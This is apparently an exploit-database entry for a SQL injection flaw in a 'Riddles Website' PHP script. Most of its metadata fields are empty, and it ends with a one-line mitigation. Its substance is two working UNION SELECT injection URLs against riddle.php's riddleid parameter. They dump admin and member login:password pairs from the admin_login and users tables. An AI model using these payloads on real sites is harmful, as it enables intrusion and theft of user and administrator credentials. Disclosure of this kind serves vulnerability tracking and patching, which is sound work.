vendor:
Riddles Website
by:
Cyb3r-1sT
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Riddles Website
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A
Riddles Website
An attacker can exploit a SQL injection vulnerability in the Riddles Website to gain access to the admin and members login information. The attacker can use the following URL to exploit the vulnerability: www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+admin_login/* for admin info and www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+users/* for members info.
Mitigation:
Input validation and parameterized queries should be used to prevent SQL injection attacks.